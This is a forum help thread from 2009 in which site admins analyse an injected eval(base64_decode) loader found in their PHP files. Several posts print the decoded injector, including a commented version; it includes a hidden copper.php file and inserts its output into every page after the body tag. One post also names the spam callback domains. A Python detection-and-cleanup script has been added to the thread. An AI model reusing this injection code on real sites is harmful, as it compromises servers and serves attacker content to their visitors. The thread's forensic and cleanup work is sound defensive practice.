Author Topic: Is this a hack?  (Read 14338 times)

Offline Xavi-Nena

  • Full Member
  • ***
  • Posts: 458
  • Gender: Female
  • ♥ I am my own malfunction....Xavi-Nena ♥
Is this a hack?
« on: February 07, 2009, 10:16:55 PM »
I have code at the top of some of my files that I'm guessing is a hack?

Code:
<? /**/eval(base64_decode('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')); ?>

Offline Xavi-Nena

  • Full Member
  • ***
  • Posts: 458
  • Gender: Female
  • ♥ I am my own malfunction....Xavi-Nena ♥
Re: Is this a hack?
« Reply #1 on: February 07, 2009, 10:37:59 PM »
Never mind, sorry, I figured out that it was.

Offline MrMike

  • Full Member
  • ***
  • Posts: 597
    • BotScout.com - Bust Those Bots!
Re: Is this a hack?
« Reply #2 on: February 07, 2009, 10:39:46 PM »
Yep, it decodes to this...and it contains more obfuscated strings. It's a hack.

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php')){include_once('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B& 8) {$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(<body[^>]*>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

Offline Xavi-Nena

  • Full Member
  • ***
  • Posts: 458
  • Gender: Female
  • ♥ I am my own malfunction....Xavi-Nena ♥
Re: Is this a hack?
« Reply #3 on: February 07, 2009, 10:42:43 PM »
Any idea how to figure out how this is happening?

Offline MrMike

  • Full Member
  • ***
  • Posts: 597
    • BotScout.com - Bust Those Bots!
Re: Is this a hack?
« Reply #4 on: February 07, 2009, 11:41:51 PM »
It looks like they put the file "copper.php" on the site and are calling it through an include:

/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php

There's a lot of GZ-encoded stuff to further hide the programming statements. It could be almost anything, a malware dropper, an extra ad displayer, a backdoor, a botnet includer file, etc etc.

Offline Xavi-Nena

  • Full Member
  • ***
  • Posts: 458
  • Gender: Female
  • ♥ I am my own malfunction....Xavi-Nena ♥
Re: Is this a hack?
« Reply #5 on: February 08, 2009, 12:18:12 AM »
Ugh, thanks...

Let's hope it stops, considering I do not even have that file in my themes directory anymore...

Offline MrMike

  • Full Member
  • ***
  • Posts: 597
    • BotScout.com - Bust Those Bots!
Re: Is this a hack?
« Reply #6 on: February 08, 2009, 12:47:47 AM »
Quote from: Xavi-Nena on February 08, 2009, 12:18:12 AM
Ugh, thanks...

Let's hope it stops, considering I do not even have that file in my themes directory anymore...
More importantly, you want to find out how your site was compromised initially or it'll probably be exploited again. They may also have installed additional code on your site that you'll want to find.

If you're running on a linux box, this command will list the newest files anywhere on the system:  ls -a -l -t -R | more

Offline Xavi-Nena

  • Full Member
  • ***
  • Posts: 458
  • Gender: Female
  • ♥ I am my own malfunction....Xavi-Nena ♥
Re: Is this a hack?
« Reply #7 on: February 08, 2009, 12:50:42 AM »
I'm not sure exactly if I am or not, or how to run that code... would you mind explaining? Thanks so much.

Offline Fustrate

  • SMF Friend
  • SMF Hero
  • *
  • Posts: 6,474
  • Gender: Male
  • Controller of the rum budget
    • @Fustrate on Twitter
    • Fustrate
Re: Is this a hack?
« Reply #8 on: February 08, 2009, 01:43:19 AM »
I got bored... doubt it'll be very helpful without the copper.php file, but here it is all cleaned up.

Code:
if(function_exists('ob_start') && !isset($GLOBALS['sh_no'])){
    $GLOBALS['sh_no'] = 1; // guard so the hook is only installed once per request

    if(file_exists('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php')){
        include_once('/home/anypupco/public_html/a-corsotalk/bb/Themes/scribbles11/images/img/img/copper.php');

        if(function_exists('gml') && !function_exists('dgobh')){
            // Fallback gzdecode() for PHP builds that lack it: skips the gzip header and inflates the body
            if(!function_exists('gzdecode')){
                function gzdecode($var1){
                    $var2 = ord(substr($var1, 3, 1)); // gzip FLG byte
                    $var3 = 10;                       // fixed header length
                    $var4 = 0;

                    if($var2&4){                      // FEXTRA: skip the extra field
                        $var4 = unpack('v',substr($var1, 10, 2));
                        $var4 = $var4[1];
                        $var3 += 2 + $var4;
                    }

                    if($var2&8)                       // FNAME: skip NUL-terminated name
                        $var3 = strpos($var1, chr(0), $var3) + 1;

                    if($var2&16)                      // FCOMMENT: skip NUL-terminated comment
                        $var3 = strpos($var1, chr(0), $var3) + 1;

                    if($var2&2)                       // FHCRC: skip header CRC
                        $var3 += 2;

                    $var5 = gzinflate(substr($var1, $var3));

                    if($var5 === FALSE)               // not gzip after all: pass through untouched
                        $var5 = $var1;

                    return $var5;
                }
            }

            // Output-buffer callback: unpacks the page and injects gml() right after <body>
            function dgobh($var6){
                Header('Content-Encoding: none');
                $var7 = gzdecode($var6);
                if(preg_match('/<body/si', $var7))
                    return preg_replace('/(<body[^>]*>)/si', '$1' . gml(), $var7);
                else
                    return gml() . $var7;
            }

            ob_start('dgobh');
        }
    }
}
Steven Hoffman
Former Team Member, 2009-2012

Offline Xavi-Nena

  • Full Member
  • ***
  • Posts: 458
  • Gender: Female
  • ♥ I am my own malfunction....Xavi-Nena ♥
Re: Is this a hack?
« Reply #9 on: February 08, 2009, 01:50:55 AM »
Forgive my ignorance, but what exactly is this cleaned up? O:)

Offline aldo

  • Sophist Member
  • *****
  • Posts: 1,356
  • Gender: Male
Re: Is this a hack?
« Reply #10 on: February 08, 2009, 01:53:14 AM »
We would need to see copper.php in order to know what it does.

Offline Fustrate

  • SMF Friend
  • SMF Hero
  • *
  • Posts: 6,474
  • Gender: Male
  • Controller of the rum budget
    • @Fustrate on Twitter
    • Fustrate
Re: Is this a hack?
« Reply #11 on: February 08, 2009, 01:54:12 AM »
Well, it's that big chunk of code from MrMike's post, with the really long variables replaced with $var1 - $var7, and put in a form that's actually legible.

The only thing I can discern from it is that it adds whatever gml() does right after the <body> tag. Without copper.php, we don't know what gml() puts in there.
Steven Hoffman
Former Team Member, 2009-2012

Offline Totosfo

  • Newbie
  • *
  • Posts: 9
Re: Is this a hack?
« Reply #12 on: February 08, 2009, 05:01:53 PM »
Hi all,

I had the same issue - the code was added to ALL .php files on my server. If anyone is interested in the copper.php file, I can provide it, just let me know where to mail it.

Best,

Thomas

Offline Fustrate

  • SMF Friend
  • SMF Hero
  • *
  • Posts: 6,474
  • Gender: Male
  • Controller of the rum budget
    • @Fustrate on Twitter
    • Fustrate
Re: Is this a hack?
« Reply #13 on: February 08, 2009, 05:22:47 PM »
Can you email it here? whatsthebigdill@fustrate.com
Steven Hoffman
Former Team Member, 2009-2012

Offline cafecommk

  • Semi-Newbie
  • *
  • Posts: 31
Re: Is this a hack?
« Reply #14 on: February 14, 2009, 05:16:34 AM »
Can someone tell me how you resolved this issue? I do not have a copper.php file, but I have this:
/**/eval(base64_decode('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'));
and it is in all my php files, even in settings_bak.

I apologize for writing in two posts http://www.simplemachines.org/community/index.php?topic=291664.msg1931245#msg1931245

thank you

Offline Fustrate

  • SMF Friend
  • SMF Hero
  • *
  • Posts: 6,474
  • Gender: Male
  • Controller of the rum budget
    • @Fustrate on Twitter
    • Fustrate
Re: Is this a hack?
« Reply #15 on: February 14, 2009, 12:29:39 PM »
You'd probably have to remove it manually from every file, or use a large upgrade like [n3rve] said in the other thread.

And there was no file at /home/vistinac/public_html/cafe/forum/mambots/editors/tinymce/jscripts/tiny_mce/plugins/media/images/paste/jscripts/copper.php? I still haven't been able to find a copy of it to see what this does, but since you said it's not there, we still don't quite know what this does.
« Last Edit: February 14, 2009, 12:32:16 PM by Fustrate »
Steven Hoffman
Former Team Member, 2009-2012

Offline cafecommk

  • Semi-Newbie
  • *
  • Posts: 31
Re: Is this a hack?
« Reply #16 on: February 15, 2009, 07:07:08 AM »
Sorry, I did not find a copper.php. I removed all the files not needed and [n3rve] helped on the large upgrade and ....
I just hope it does not make me any more trouble.

Offline ccondrup

  • Semi-Newbie
  • *
  • Posts: 47
  • Gender: Male
Re: Is this a hack?
« Reply #17 on: May 07, 2009, 09:38:23 PM »
I have recently had my SMF 1.1.8 board hacked. I have recently seen an increase in automatically registered accounts, and a couple of automated spam posts, so I have been monitoring a little closer lately. When suddenly lots of avatars went missing, I knew something was up.

All .php files under /www/ had this line injected at the top of the file:
Code:
<?php /**/eval(base64_decode('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')); ?>

No files with other file extensions were touched, and .php files outside of /www/ were also unharmed.

The above base64 hash decodes to what is in the attached decoded_injection.php.
It in turn calls the main hack file, in my case called style.css.php - in my case this was placed in a subdirectory of an outdated phpmyadmin-install, quite possibly their point of entry for the exploit. I guess this file can be named copper.php or whatever in other circumstances.

This style.css.php file was a 170kb file with a huge base64 hash. It decoded to approx 20 new base64 encoded evals. I decoded everything I found and ran it through a code prettifier, and ended up with a 100kb php file of approx 2000 lines of code. I did a search+replace for some of the function names, but quickly tired and stopped halfway through - the file is just so massive...

Also, if your site is infected, take note of which folder that last mentioned file is in, because in the same folder is where it stores the generated spam files this hack creates. They are files without extensions, names ranging from just "t", "50", to longer names such as "f2219f70f695539a82941423841dc26c". I have attached 3 examples of those final spam files this hack aims to generate.

You can search the style.css.php file for "http:" to quickly find the involved spam domains, which include:
   nomsat23.net nssat3.com wplsat23.net pearch.net gawab.com
After googling gawab.com and the other mentioned callback-urls, I found several domains common forum admins have had trouble with, so I am creating an sql file to add all these domains to my smf bantriggers. It's also attached as spamdomains.sql - remember to replace 15 with the id of the bangroup you want to add these to.

Hope this helps someone. If anyone cares to dig deeper into the code, please update the thread with whatever you find.
« Last Edit: May 07, 2009, 09:50:11 PM by ccondrup »
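An added example (not code from any poster in this thread) of the search-and-clean that cafecommk asked about and ccondrup did by hand: walk a web root, flag every .php file that begins with the eval(base64_decode(...)) loader, decode it to see which file it pulls in, and strip the loader while keeping a .bak copy. The regex, the /srv/www/img/copper.php path and the two sample files are constructed for the demo.

```python
import base64
import os
import re
import tempfile
# Loader seen at the top of every .php file in this thread: <? /**/eval(base64_decode('...')); ?>
LOADER_RE = re.compile(
    r"<\?(?:php)?\s*/\*\*/eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\);\s*\?>[ \t]*\r?\n?")

def find_loaders(root):
    """Map each .php file under root that starts with the loader to its decoded payload."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    m = LOADER_RE.match(fh.read(8192).decode("latin-1"))
                if m:
                    hits[path] = base64.b64decode(m.group(1)).decode("latin-1", "replace")
    return hits

def include_targets(payload):  # files a decoded loader includes (copper.php / style.css.php here)
    return re.findall(r"include(?:_once)?\('([^']+)'\)", payload)

def strip_loader(path):
    """Remove the loader from one file, keeping an untouched .bak copy; True if changed."""
    with open(path, "rb") as fh:
        data = fh.read()
    cleaned = LOADER_RE.sub("", data.decode("latin-1"), count=1).encode("latin-1")
    if cleaned == data:
        return False
    with open(path + ".bak", "wb") as fh:
        fh.write(data)
    with open(path, "wb") as fh:
        fh.write(cleaned)
    return True

def demo():
    """Constructed sample tree: one clean file, one carrying a loader for an assumed path."""
    root = tempfile.mkdtemp()
    payload = "if(file_exists('/srv/www/img/copper.php')){include_once('/srv/www/img/copper.php');}"
    b64 = base64.b64encode(payload.encode()).decode()
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php /**/eval(base64_decode('%s')); ?>\n<?php echo 'hi'; ?>\n" % b64)
    with open(os.path.join(root, "clean.php"), "w") as fh:
        fh.write("<?php echo 'clean'; ?>\n")
    before = find_loaders(root)
    changed = [strip_loader(p) for p in before]
    return before, changed, find_loaders(root)
```

Run find_loaders() first and review the decoded payloads and their include targets; those included files (and anything else modified around the same time) are what still needs removing after the one-line loaders are gone.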

Offline busterone

  • SMF Hero
  • ******
  • Posts: 2,106
  • Gender: Male
  • Devil Dog
    • The Demon's Den
Re: Is this a hack?
« Reply #18 on: May 07, 2009, 10:20:13 PM »
That looks really familiar.  Did you, or do you have a member named Krisbarteo?

If so, you may want to look at this thread-
http://www.simplemachines.org/community/index.php?topic=307717.msg2047539#msg2047539

Offline ccondrup

  • Semi-Newbie
  • *
  • Posts: 47
  • Gender: Male
Re: Is this a hack?
« Reply #19 on: May 07, 2009, 10:38:51 PM »
Wouldn't you know it, I came directly to this thread via a search for the base64 hash in all the files. After I had posted, I looked at the other threads in the forum, so I found out how common this issue was ;)

I have already read the one you linked, and now all my bantriggers are removed and this mod has been installed. Yes, Krisbarteo was present, and a few other suspicious members from same host/ip. So far it has found ~10 registered members that are confirmed spammers. Already love the mod ;)